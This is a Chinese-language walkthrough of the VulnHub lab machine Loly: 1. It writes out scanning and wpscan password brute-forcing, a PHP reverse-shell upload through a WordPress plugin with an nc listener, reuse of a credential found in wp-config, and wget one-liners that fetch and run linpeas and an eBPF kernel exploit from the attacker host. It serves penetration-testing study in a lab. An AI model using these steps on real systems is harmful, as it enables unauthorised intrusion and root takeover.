vulnhub Loly: 1
渗透思路:
nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan爆破wordpress用户名和密码 ---- 利用wordpress AdRotate文件上传功能getshell ---- 利用内核漏洞提权(eBPF_verifier)
环境信息:
靶机:192.168.101.102
攻击机:192.168.101.34
具体步骤:
1、nmap扫描端口
sudo nmap -sV -sC -p- 192.168.101.102
只扫描到80端口,看来只能通过webshell的方式进入靶机了
2、gobuster扫描网站目录
gobuster dir -u http://192.168.101.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
扫描到/wordpress
3、wpscan爆破wordpress用户名和密码
首先用wpscan枚举wordpress用户名,发现用户名loly
wpscan --url http://192.168.101.102/wordpress -e
接着用wpscan爆破loly的密码,得到fernando
wpscan --url http://192.168.101.102/wordpress -U loly -P "rockyou.txt"
4、利用wordpress AdRotate文件上传功能getshell
浏览器访问http://192.168.101.102/wordpress/wp-login.php,发现无法访问,并有如下提示
根据提示可以判断靶机wordpress对应的域名是loly.lc,因此需要修改/etc/hosts文件,增加靶机ip地址和loly.lc的对应关系
sudo vim /etc/hosts
修改好/etc/hosts之后,wordpress的login页面可以正常访问
以用户名loly,密码fernando登录后,会出现确认网站管理邮箱的页面,点The email is correct就行
进入管理页面后,一通搜索有没有改模版或者上传文件的地方,最后发现AdRotate的Manage Media中有一个上传文件的地方。
将kali上的/usr/share/webshells/php/php-reverse-shell.php中的$ip和$port分别修改为攻击机ip和攻击机监听的tcp端口,然后压缩为phpshell.zip文件,然后在该页面上传
在AdRotate的Settings中可以找到文件上传的位置
攻击机上监听8888端口
nc -nlvp 8888
浏览器访问http://loly.lc/wordpress/wp-content/banners/phpshell.php
可以得到www-data的反弹shell,再执行如下命令得到交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
5、利用内核漏洞提权(eBPF_verifier)
查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为
lolyisabeautifulgirl
尝试访问数据库发现没什么有价值的信息,来到/home目录下发现本地有一个用户loly,联想到刚刚发现的数据库密码和loly有关,怀疑loly的系统密码可能也是lolyisabeautifulgirl
切换用户到loly
su - loly
loly家目录下有个cleanup.py文件
该文件内容是删除/tmp目录,看起来有点像定时任务,于是写了个python反弹shell进去,但是等了半天没反应
只能请linpeas.sh出马,在攻击机上起http服务
python2 -m SimpleHTTPServer 80
靶机上下载并执行linpeas.sh
wget http://192.168.101.34/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
linpeas执行后给出几条可能性很高的内核漏洞利用建议,第一条就是下图这个eBPF_verifier
exp的下载地址为https://www.exploit-db.com/download/45010
先将exp下载到攻击机上,然后靶机从攻击机下载、编译、并执行exp,得到root权限
wget http://192.168.101.34/45010.c && gcc -o exp 45010.c && chmod +x exp && ./exp
在/root下找到root.txt
vulnhub Loly: 1相关推荐
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
最新文章
- linux c 获取文件权限,如何在C / C++中以编程方式读取Linux文件权限
- Spring 入门知识点笔记整理
- [Google Guava] 2.4-集合扩展工具类
- 网页设计必备工具 firefox Web Developer插件 CSS工具组教程
- docker swarm MySQL_容器与云|在 Docker 中运行 MySQL:多主机网络下 Docker Swarm 模式的容器管理...
- Eigen入门之密集矩阵 8 - resharp slicing切片
- asp.net接受表单验证格式后再提交数据_如何解析 el-form-renderer 表单渲染器1.14.0...
- git commit 规范指南
- 【硬件解码系列】之ffmpeg硬件加速器
- 如何理解Linux shell中的“21”?
- 马士兵Java自学之路
- [项目实战篇] Emos在线办公小程序--搭建项目
- nginx小技巧-动态域名(微信,小程序80端口)
- matlab gradient函数原理
- 什么是Microsoft 365?
- Java程序员的魔法杖-Arthas 3.1.2版本发布了
- jQuery选择器中的通配符[id*='id']及jquery选择器总结
- 工具及方法 - 如何保护眼睛
- 魔兽世界运营时间线timeLine(2004-2014)
- IC卡、ID卡、M1卡、射频卡的区别是什么【转】